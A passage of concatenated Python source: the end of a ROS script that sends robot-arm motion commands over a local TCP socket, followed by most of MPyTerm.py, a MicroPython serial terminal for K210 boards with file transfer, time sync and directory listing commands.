# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
#print(data)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
MPyTerm.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import tty
import termios
import time
import argparse
import binascii
import re
import shutil
from threading import Thread
from datetime import datetime
try:
import serial
except ImportError:
print("PySerial must be installed, run `pip3 install pyserial`\r\n")
sys.exit(1)
KEY_NONE = 0x00
KEY_LEFT = 0x1f
KEY_RIGHT = 0x1e
KEY_HOME = 0x10
KEY_END = 0x03
KEY_QUIT = 0x11
KEY_ENTER = 0x0a
KEY_BACKSPACE = 0x08
KEY_DELETE = 0x7f
KEY_TAB = 0x09
KEY_DUP = 0x04
#============
class PyTerm:
KEYMAP = { ## Gets lengthy
"\x1b[D" : KEY_LEFT,
"\x1b[C" : KEY_RIGHT,
"\x1b[H" : KEY_HOME, ## in Linux Terminal
"\x1bOH" : KEY_HOME, ## Picocom, Minicom
"\x1b[1~": KEY_HOME, ## Putty
"\x1b[F" : KEY_END, ## Linux Terminal
"\x1bOF" : KEY_END, ## Picocom, Minicom
"\x1b[4~": KEY_END, ## Putty
"\x03" : KEY_DUP, ## Ctrl-C
"\r" : KEY_ENTER,
"\x7f" : KEY_BACKSPACE, ## Ctrl-? (127)
"\x1b[3~": KEY_DELETE,
"\x11" : KEY_QUIT, ## Ctrl-Q
"\x1bq" : KEY_QUIT, ## Alt-Q
"\n" : KEY_ENTER,
"\x04" : KEY_DUP, ## Ctrl-D
"\x09" : KEY_TAB,
}
#----------------------------------------------------------------------------
def __init__(self, baudrate=115200, device='/dev/ttyUSB0', rst=0, clr=False):
self.DEVICE = device
self.BAUDRATE = baudrate
self.ESCAPECHAR = "\033"
self.VERSION = "5.1.3"
self.ShutdownReceiver = False
self.ReceiverToStdout = True
self.DefaultTimeout = 0.1
self.width, self.height = shutil.get_terminal_size()
self.colors = clr;
if clr is True:
self.TCLR = dict(
NORMAL = '\033[0m',
RED = '\033[1;31m',
BLUE = '\033[1;34m',
YELLOW = '\033[1;33m',
WHITE = '\033[1;37m'
)
else:
self.TCLR = dict(
NORMAL = '',
RED = '',
BLUE = '',
YELLOW = '',
WHITE = ''
)
print("\n"+self.TCLR['RED']+"--[ "+self.TCLR['BLUE']+"MicroPython terminal "+self.TCLR['RED']+" ver. "+self.TCLR['BLUE']+self.VERSION + self.TCLR['RED']+" ]-- "+self.TCLR['NORMAL'])
print(self.TCLR['RED']+"--[ "+self.TCLR['BLUE']+"Press ESC twice for command mode"+self.TCLR['RED']+" ]-- "+self.TCLR['NORMAL']+"\n")
# Open remote terminal device
try:
self.uart = serial.Serial(
port = self.DEVICE,
baudrate= self.BAUDRATE,
bytesize= serial.EIGHTBITS,
parity = serial.PARITY_NONE,
stopbits= serial.STOPBITS_ONE,
timeout = self.DefaultTimeout,
xonxoff = 0,
rtscts = 0,
interCharTimeout=None
)
if rst:
self.uart.dtr = False
time.sleep(0.1)
self.uart.dtr = True
else:
self.uart.write(b'\r\n')
except Exception as e:
raise Exception(self.TCLR['RED']+"Accessing "+self.TCLR['WHITE'] + self.DEVICE + " "+self.TCLR['RED']+"failed\r\n"+self.TCLR['WHITE']+"PyTerm exit"+self.TCLR['NORMAL']+"\r\n")
# Setup local terminal
self.stdinfd = sys.stdin.fileno()
self.oldstdinsettings = termios.tcgetattr(self.stdinfd)
tty.setraw(self.stdinfd) # from now on, end-line must be "\r\n"
# Start receiver thread
self.ReceiverThread = Thread(target=self.ReceiveData, args=(self.uart, False))
self.ReceiverThread.start()
# this is the main loop of this software
try:
self.HandleUnbufferedUserInput();
except Exception as e:
print("\r\n"+self.TCLR['RED']+"Error: failed with the following exception:"+self.TCLR['NORMAL']+"\r\n")
print(e, "\r\n")
# Shutdown receiver thread
self.ShutdownReceiver = True
if self.ReceiverThread.isAlive():
self.ReceiverThread.join()
# Clean up everything
termios.tcsetattr(self.stdinfd, termios.TCSADRAIN, self.oldstdinsettings)
self.uart.close()
#----------------------
def clear_to_eol(self):
sys.stdout.write("\x1b[0K")
sys.stdout.flush()
#-------------------
def get_input(self): ## read from interface/keyboard one byte each and match against function keys
while True:
in_buffer = sys.stdin.read(1)
if in_buffer == '\x1b': ## starting with ESC, must be fct
while True:
in_buffer += sys.stdin.read(1)
c = in_buffer[-1]
if c == '~' or (c.isalpha() and c != 'O'):
break
if in_buffer in self.KEYMAP:
c = self.KEYMAP[in_buffer]
return c, None
elif ord(in_buffer[0]) >= 32:
return KEY_NONE, in_buffer
# Line editor
#------------------------------------------------
def line_edit(self, prompt, prompt_len, default):
# Write a message and move cursor back
push_msg = lambda msg: sys.stdout.write(msg + "\b" * len(msg))
sys.stdout.write(prompt)
sys.stdout.write(default)
sys.stdout.flush()
self.clear_to_eol()
res = default
pos = len(res)
while True:
key, char = self.get_input() ## Get Char of Fct.
if key == KEY_NONE: ## char to be inserted
if (prompt_len + len(res)) < (self.width - 2):
res = res[:pos] + char + res[pos:]
sys.stdout.write(res[pos])
sys.stdout.flush()
pos += len(char)
push_msg(res[pos:]) ## update tail
sys.stdout.flush()
elif key in (KEY_ENTER, KEY_TAB): ## Finis
return res, len(res)
elif key in (KEY_QUIT, KEY_DUP): ## Abort
return None, len(res)
elif key == KEY_LEFT:
if pos > 0:
sys.stdout.write("\b")
sys.stdout.flush()
pos -= 1
elif key == KEY_RIGHT:
if pos < len(res):
sys.stdout.write(res[pos])
sys.stdout.flush()
pos += 1
elif key == KEY_HOME:
sys.stdout.write("\b" * pos)
sys.stdout.flush()
pos = 0
elif key == KEY_END:
sys.stdout.write(res[pos:])
sys.stdout.flush()
pos = len(res)
elif key == KEY_DELETE: ## Delete
if pos < len(res):
res = res[:pos] + res[pos+1:]
push_msg(res[pos:] + ' ') ## update tail
sys.stdout.flush()
elif key == KEY_BACKSPACE: ## Backspace
if pos > 0:
res = res[:pos-1] + res[pos:]
sys.stdout.write("\b")
sys.stdout.flush()
pos -= 1
push_msg(res[pos:] + ' ') ## update tail
sys.stdout.flush()
#-----------------------------------------
def ReceiveData(self, uart, binary=False):
data = ""
last_char = '?'
while not self.ShutdownReceiver:
if not self.ReceiverToStdout:
time.sleep(0.01);
continue
try:
data = self.uart.read(self.uart.inWaiting())
except:
return
if data:
try:
string = data.decode("utf-8")
ostr = ""
for c in string:
if ord(c) != 4:
if (c == '\n') and (last_char != '\r'):
ostr = ostr + '\r'
last_char = c
ostr = ostr + str(c)
else:
ostr = ostr + "[{}]".format(hex(ord(c)))
except UnicodeDecodeError:
string = "[" + str(data) + "]"
ostr = string
sys.stdout.write(ostr)
sys.stdout.flush()
time.sleep(0.01);
#---------------------
def crc_16(self, buf):
crc = 0xFFFF
for c in buf:
crc = (crc ^ (c << 8)) & 0xFFFF
for i in range(8):
if (crc & 0x8000):
crc = ((crc << 1) & 0xFFFF) ^ 0x1021
else:
crc = (crc << 1) & 0xFFFF
return crc
#-----------------------------------------
def EnterRawREPL(self, imprt, cmd, bdr=0):
self.ReceiverToStdout = False
time.sleep(0.1)
dummy = self.uart.read()
self.uart.timeout = 4
# enter raw REPL
self.uart.write(b'\x01')
resp = self.uart.read(28)
if resp == b'\r\nraw REPL; CTRL-B to exit\r\n':
#print("In Raw REPL", end="\r\n")
time.sleep(0.1)
self.uart.write(imprt)
self.uart.write(cmd)
self.uart.write(b'\x04') # Execute
time.sleep(0.1)
if bdr > 0:
print("baudrate changed to {}".format(bdr), end="\r\n")
self.uart.baudrate = bdr
time.sleep(0.1)
return True
print("\r\nerror waiting for Raw REPL", end="\r\n")
self.uart.timeout = self.DefaultTimeout
self.ReceiverToStdout = False
return False
#---------------------
def ExitRawREPL(self):
# exit raw REPL
self.uart.timeout = self.DefaultTimeout
tmo = 10
while True:
bb = self.uart.read(1)
if bb == b'\04':
#print("Confirmation received ({})".format(tmo), end="\r\n")
pass
elif bb == b'>':
#print("MPy prompt received ({})".format(tmo), end="\r\n")
break
tmo -= 1
if tmo == 0:
print("\r\nExit Raw REPL: timeout", end="\r\n")
break
self.uart.write(b'\x02') # Exit RawREPL
time.sleep(0.1)
tmo = 0
bb = self.uart.read(1)
while len(bb) > 0:
tmo += 1
bb = self.uart.read(1)
self.ReceiverToStdout = True
#print("Exit Raw REPL ({})".format(tmo), end="\r\n")
#-------------------------------------------------
def SendFileToDevice(self, src_fname, dest_fname):
try:
filesize = os.path.getsize(src_fname)
src_file = open(src_fname, 'rb')
send_cmd = "os.get_file('{}', {})\r\n".format(dest_fname, str(filesize))
except:
print("Error opening file", end="\r\n")
return
print("Sending local file "+self.TCLR['BLUE']+src_fname+self.TCLR['NORMAL']+" to "+self.TCLR['BLUE']+dest_fname+self.TCLR['NORMAL']+"\r\n", end="\r\n")
if not self.EnterRawREPL(b'import os\r\n', bytes(send_cmd.encode('utf-8'))):
return
ack = b'\x00'
while ack != b'\x06':
ack = self.uart.read(1)
if len(ack) == 0:
break
try:
if len(ack) == 0:
src_file.close()
print("timeout waiting for device acknowledge", end="\r\n")
self.ExitRawREPL()
return
start_time = time.time()
bytes_remaining = filesize
while bytes_remaining > 0:
read_size = min(bytes_remaining, 1024)
buf = src_file.read(read_size)
crc = self.crc_16(buf)
bcrc = bytes([crc >> 8, crc & 0xFF])
buff = b''.join([buf,bcrc])
bytes_remaining -= read_size
# Wait for ack from remote
if ack == b'\x00':
ack = self.uart.read(1)
if ack == b'\x07' or ack == b'\x06':
time.sleep(0.01)
self.uart.write(buff)
if ack == b'\x06':
sys.stdout.write("\r--> {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
else:
sys.stdout.write("\r-R> {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
elif ack == b'\x08' or ack == b'\x09' or ack == b'\x0A':
if bytes_remaining > 0:
print("\r\nabort requested from remote [{}]".format(ack[0]), end="\r\n")
break
else:
if bytes_remaining > 0:
print("\r\ntimed out or error in sending file to remote [{}]".format(ack), end="\r\n")
break
ack = b'\x00'
except Exception as e:
print("\r\nexception while sending file to remote ({})".format(e), end="\r\n")
src_file.close()
print("", end="\r\n")
if bytes_remaining <= 0:
end_time = time.time()
print("OK, took "+self.TCLR['BLUE'] + "%.3f" % (end_time - start_time) + self.TCLR['NORMAL']+" seconds, " + self.TCLR['BLUE'] + "%.3f" % ((filesize / (end_time - start_time)) / 1024) + self.TCLR['NORMAL']+" KB/s", end="\r\n")
self.ExitRawREPL()
#------------------------------------------------------
def ReceiveFileFromDevice(self, src_fname, dest_fname):
try:
dst_file = open(dest_fname, 'wb')
recv_cmd = "os.send_file('{}', 0)\r\n".format(src_fname)
except:
print("Error opening file", end="\r\n")
return
print("Receiving remote file "+self.TCLR['BLUE']+src_fname+self.TCLR['NORMAL']+" to "+self.TCLR['BLUE']+dest_fname+self.TCLR['NORMAL']+"\r\n", end="\r\n")
if not self.EnterRawREPL(b'import os\r\n', bytes(recv_cmd.encode('utf-8'))):
return
ack = b'\x00'
while ack != b'\x06':
ack = self.uart.read(1)
if len(ack) == 0:
break
if len(ack) == 0:
print("timeout waiting for file", end="\r\n")
dst_file.close()
self.ExitRawREPL()
return
# receive filesize first
fsblock_ok = False
fs_bufr = self.uart.read(7)
if len(fs_bufr) == 7:
if fs_bufr[0] == 0x5B:
fs_buf = b'\x06' + fs_bufr
# check crc (last 2 bytes received)
crc = self.crc_16(fs_buf[0:6])
rcrc = (fs_buf[6] << 8) + fs_buf[7]
if crc == rcrc:
fsblock_ok = True
if fsblock_ok == False:
self.uart.write(b'\x08') # ASCII ACK is 0x08, abort
print("Error receiving file size", end="\r\n")
dst_file.close()
self.ExitRawREPL()
return
filesize = (fs_buf[5] << 24) + (fs_buf[4] << 16) + (fs_buf[3] << 8) + fs_buf[2]
self.uart.write(b'\x06') # ASCII ACK is 0x06
try:
start_time = time.time()
bytes_remaining = filesize
ntry = 3
while bytes_remaining > 0:
read_size = min(bytes_remaining, 1024)
while ntry > 0:
read_buf = self.uart.read(read_size+2)
if len(read_buf) != read_size+2:
print("\r\nwrong block size received: {}, expected {} [{}]".format(len(read_buf), read_size+2, read_buf), end="\r\n")
ntry = 0
continue
# check for abort block (all bytes 0x5A)
cc = True
for idx in range(read_size+2):
if read_buf[idx] != 0x5A:
cc = False
break
if cc:
#abort block received
print("\r\nabort requested from remote", end="\r\n")
ntry = 0
continue
# check crc (last 2 bytes received)
bcrc = read_buf[-2:]
rcrc = (bcrc[0] << 8) + bcrc[1]
crc = self.crc_16(read_buf[0:-2])
if crc == rcrc:
dst_file.write(read_buf[0:-2])
# Send an ack to the remote as a form of flow control
sys.stdout.write("\r<<< {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
self.uart.write(b'\x06') # ASCII ACK is 0x06
break
else:
sys.stdout.write("\r<R< {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
self.uart.write(b'\x07') # ASCII ACK is 0x07, repeat
ntry -= 1
if ntry == 0:
print("\r\ntimed out or error in receiving file from remote", end="\r\n")
self.uart.write(b'\x08') # ASCII ACK is 0x08, abort
bytes_remaining = 0
continue
bytes_remaining -= read_size
if ntry > 0:
sys.stdout.write("\r<<< {0:.2f}%\n".format((filesize-bytes_remaining) / filesize * 100))
except Exception as e:
print("\r\nexception while receiving file from remote ({})".format(e), end="\r\n")
print("", end="\r\n")
if bytes_remaining <= 0:
end_time = time.time()
print("OK, took "+self.TCLR['BLUE']+"%.3f" % (end_time - start_time) + self.TCLR['NORMAL']+" seconds, "+self.TCLR['BLUE']+"%.3f" % ((filesize / (end_time - start_time)) / 1024)+self.TCLR['NORMAL']+" KB/s", end="\r\n")
dst_file.close()
self.ExitRawREPL()
#------------------
def SyncTime(self):
now = time.localtime(time.time())
tz = int(time.strftime("%z", time.localtime())) // 100
tt = str((now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec, 0, 0))
cmd = "_ = time.mktime({}, tz={}, setrtc=True)\r\n".format(tt, tz)
if not self.EnterRawREPL(b'import time\r\n', bytes(cmd.encode('utf-8'))):
return
self.ExitRawREPL()
#-----------------------------
def SetBaudrate(self, bdrate):
cmd = "print(machine.repl_baudrate({}))\r\n".format(bdrate)
if not self.EnterRawREPL(b'import machine\r\n', bytes(cmd.encode('utf-8')), bdr=bdrate):
return
time.sleep(0.5)
self.ExitRawREPL()
#--------------------------------------------------
def ReadDirFromRemote(self, remote_dir, short=True):
cmd = "try:\r\n print(os.listdirex('{}', {}))\r\nexcept:\r\n print('[]')\r\n".format(remote_dir, str(short))
if not self.EnterRawREPL(b'import os\r\n', bytes(cmd.encode('utf-8'))):
return
response = ""
rdb = b'\x00'
while rdb != b'\x04':
rdb = self.uart.read(1)
if len(rdb) == 0:
break
if rdb == b'\x04':
break
response = response + chr(rdb[0])
self.ExitRawREPL()
_locals = locals()
dirlist = []
if response[:3] == ">OK":
response = response[3:]
if len(response) >= 2:
response = response.strip('\r\n')
response = "dirlist = " + response
try:
exec(response, globals(), _locals)
dirlist = _locals['dirlist']
except:
pass
return dirlist
#----------------------
def Get2ndEscape(self):
char = sys.stdin.read(1)
if char == self.ESCAPECHAR:
return True
elif char == "[":
self.uart.write("\033[".encode("utf-8"))
return False
data = char.encode("utf-8")
self.uart.write(data)
return False
#-----------------------------------
def HandleUnbufferedUserInput(self):
char = ""
while True:
char = sys.stdin.read(1)
if char == self.ESCAPECHAR:
if self.Get2ndEscape():
prompt = self.TCLR['RED']+"--["+self.TCLR['BLUE']+"mpTerm command: "+self.TCLR['NORMAL']
print("\r\n")
command, cmd_len = self.line_edit(prompt, 19, '')
if command is None:
if self.colors is True:
print("\r{}".format(prompt) + self.TCLR['WHITE']+"aborted"+self.TCLR['NORMAL']+"\033[0K", end="\r\n")
else:
cmd_blank = " "*cmd_len
print("\r{}".format(prompt) + self.TCLR['WHITE']+"aborted"+self.TCLR['NORMAL']+cmd_blank, end="\r\n")
elif command == "exit":
print("\r\n"+self.TCLR['BLUE']+" Exit PyTerm "+self.TCLR['RED']+"]--"+self.TCLR['NORMAL']+"\r\n", end="")
break
elif command == "version":
sys.stdout.write("\r\n")
sys.stdout.flush()
print("Version: " + self.VERSION, end="\r\n")
elif command[0:5] == "send ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
sys.stdout.write("\r\n")
self.SendFileToDevice(cmd[1], cmd[2])
elif len(cmd) == 2:
# send to '/flash', same name as source
fname = cmd[1].split('/')
if len(fname) > 0:
sys.stdout.write("\r\n")
self.SendFileToDevice(cmd[1], "/flash/" + fname[len(fname)-1])
else:
print("\r\nWrong command arguments", end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:8] == "senddir ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if os.path.isdir(cmd[1]):
ldir = cmd[1].rstrip('/') + '/'
rdir = cmd[2].rstrip('/') + '/'
sys.stdout.write("\r\n")
for f in os.listdir(cmd[1]):
if os.path.isfile(ldir + f):
self.SendFileToDevice(ldir + f, rdir + f)
time.sleep(0.5)
else:
print("\r\n{} is not a directory".format(cmd[1]), end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:5] == "recv ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if os.path.isdir(cmd[2]):
dirname = cmd[2].rstrip('/') + '/'
fname = cmd[1].split('/')
if len(fname) > 0:
fname = dirname + fname[len(fname)-1]
else:
print("\r\nWrong command arguments", end="\r\n")
else:
fname = cmd[2]
sys.stdout.write("\r\n")
self.ReceiveFileFromDevice(cmd[1], fname)
elif len(cmd) == 2:
# receive to current directory, same name as source
fname = cmd[1].split('/')
if len(fname) > 0:
sys.stdout.write("\r\n")
self.ReceiveFileFromDevice(cmd[1], fname[len(fname)-1])
else:
print("\r\nWrong command arguments", end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:8] == "recvdir ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if not os.path.isdir(cmd[2]):
os.mkdir(cmd[2])
dirlist = self.ReadDirFromRemote(cmd[1])
if len(dirlist) > 0:
rdir = cmd[1].rstrip('/') + '/'
ldir = cmd[2].rstrip('/') + '/'
sys.stdout.write("\r\n")
for f in dirlist:
self.ReceiveFileFromDevice(rdir + f, ldir + f)
time.sleep(0.5)
else:
print("\r\nNo files to receive\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:3] == "ls ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if (len(cmd) == 2) or (len(cmd) == 3):
short_list = False
if (len(cmd) == 3):
if cmd[2] == "short":
short_list = True
rdir = cmd[1].rstrip('/') + '/'
dirlist = self.ReadDirFromRemote(rdir, short=short_list)
if len(dirlist) > 0:
dirlist.sort(key=lambda x: (not x[1], x[0].lower()))
sys.stdout.write("\r\n\r\nList of directory '{}':\r\n".format(rdir))
sys.stdout.write("{}\r\n".format("".rjust(21+len(rdir), '-')))
if short_list is False:
max_name_len = 0
max_size_len = 0
for f in dirlist:
if len(f[0]) > max_name_len:
max_name_len = len(f[0])
if len(str(f[2])) > max_size_len:
max_size_len = len(str(f[2]))
max_name_len += 1
max_size_len += 1
for f in dirlist:
print("{} {} {} {}".format(f[0].rjust(max_name_len), " <dir>" if f[1] else "<file>", str(f[2]).rjust(max_size_len), datetime.utcfromtimestamp(f[3]).strftime('%Y-%m-%d %H:%M:%S')), end="\r\n")
else:
dirlist.sort(key=lambda name: name.lower())
for f in dirlist:
print("{}".format(f), end="\r\n")
else:
print("\r\nNo files to list\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:8] == "lslocal ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if (len(cmd) == 2) or (len(cmd) == 3):
short_list = False
if (len(cmd) == 3):
if cmd[2] == "short":
short_list = True
rdir = cmd[1]
lpath = os.path.abspath(rdir)
dirlst = os.listdir(rdir)
if len(dirlst) > 0:
sys.stdout.write("\r\n\r\nList of directory '{}':\r\n".format(lpath))
sys.stdout.write("{}\r\n".format("".rjust(21+len(lpath), '-')))
if short_list is False:
dirlist = []
for f in dirlst:
file_path = os.path.abspath(lpath + "/" + f)
st = os.stat(file_path)
dirlist.append((f, (st[0] & 0x8000) == 0, st[6], st[8]))
dirlist.sort(key=lambda x: (not x[1], x[0].lower()))
max_name_len = 0
max_size_len = 0
for f in dirlist:
if len(f[0]) > max_name_len:
max_name_len = len(f[0])
if len(str(f[2])) > max_size_len:
max_size_len = len(str(f[2]))
max_name_len += 1
max_size_len += 1
for f in dirlist:
print("{} {} {} {}".format(f[0].rjust(max_name_len), " <dir>" if f[1] else "<file>", str(f[2]).rjust(max_size_len), datetime.utcfromtimestamp(f[3]).strftime('%Y-%m-%d %H:%M:%S')), end="\r\n")
else:
dirlst.sort(key=lambda name: name.lower())
for f in dirlst:
print("{}".format(f), end="\r\n")
else:
print("\r\nNo files to list\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:9] == "baudrate ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 2:
baudrate = int(cmd[1])
print("\r\nbautrate set to {}\r\n".format(baudrate), end="\r\n")
self.uart.baudrate = baudrate
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:13] == "set_baudrate ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 2:
baudrate = int(cmd[1])
print("\r\nset device and terminal bautrate to {}\r\n".format(baudrate), end="\r\n")
self.SetBaudrate(baudrate)
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command == "synctime":
try:
sys.stdout.write("\r\n")
self.SyncTime()
print("OK.", end="\r\n")
except:
print("Error", end="\r\n")
else:
if self.colors is True:
print("\r{}".format(prompt)+self.TCLR['RED']+"unknown command !"+self.TCLR['NORMAL']+"\033[0K"+"\r\n", end="\r\n")
else:
cmd_blank = " "*cmd_len
print("\r{}".format(prompt)+self.TCLR['RED']+"unknown command !"+self.TCLR['NORMAL']+cmd_blank+"\r\n", end="\r\n")
print(self.TCLR['WHITE']+"Available commands:"+self.TCLR['NORMAL'], end="\r\n")
print(self.TCLR['BLUE'] +" exit "+self.TCLR['NORMAL']+" - exit the terminal", end="\r\n")
print(self.TCLR['BLUE'] +" version "+self.TCLR['NORMAL']+" - print version info", end="\r\n")
print(self.TCLR['BLUE'] +" synctime "+self.TCLR['NORMAL']+" - synchronize device time to the PC time", end="\r\n")
print(self.TCLR['BLUE'] +" baudrate "+self.TCLR['WHITE']+"bdr "+self.TCLR['NORMAL']+" - set terminal baudrate", end="\r\n")
print(self.TCLR['BLUE'] +"set_baudrate "+self.TCLR['WHITE']+"bdr "+self.TCLR['NORMAL']+" - set device and terminal baudrate", end="\r\n")
print(self.TCLR['BLUE'] +" send "+self.TCLR['WHITE']+"lfile rfile"+self.TCLR['NORMAL']+" - send file to device", end="\r\n")
print(self.TCLR['BLUE'] +" recv "+self.TCLR['WHITE']+"rfile lfile"+self.TCLR['NORMAL']+" - receive file from device", end="\r\n")
print(self.TCLR['BLUE'] +" senddir "+self.TCLR['WHITE']+"ldir rdir "+self.TCLR['NORMAL']+" - send all files from local directory to device's directory", end="\r\n")
print(self.TCLR['BLUE'] +" recvdir "+self.TCLR['WHITE']+"rdir ldir "+self.TCLR['NORMAL']+" - receive all files from device's directory to local directory", end="\r\n")
print(self.TCLR['BLUE'] +" ls "+self.TCLR['WHITE']+"rdir [short]"+self.TCLR['NORMAL']+" - list remote directory, if 'short' is given, only file names are printed", end="\r\n")
print(self.TCLR['BLUE'] +" lslocal "+self.TCLR['WHITE']+"rdir [short]"+self.TCLR['NORMAL']+" - list local directory, if 'short' is given, only file names are printed", end="\r\n")
print(self.TCLR['YELLOW']+" Enter "+self.TCLR['NORMAL']+" - accept and execute command", end="\r\n")
print(self.TCLR['YELLOW']+" Ctrl-Q "+self.TCLR['NORMAL']+" - aborts command mode\r", end="\r\n")
print(self.TCLR['BLUE']+"back to device "+self.TCLR['RED']+"]--"+self.TCLR['NORMAL']+"\r\n", end="")
self.uart.write(b'\r\n')
else:
data = char.encode("utf-8")
self.uart.write(data)
#=========================
if __name__ == '__main__':
cli = argparse.ArgumentParser(
description="Serial ternimal optimized for K210 MicroPython.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
cli.add_argument("-b", "--baudrate", default=115200, type=int, action="store",
help="The baudrate used for the communication.")
cli.add_argument("-r", "--reset", default=False, type=str, action="store",
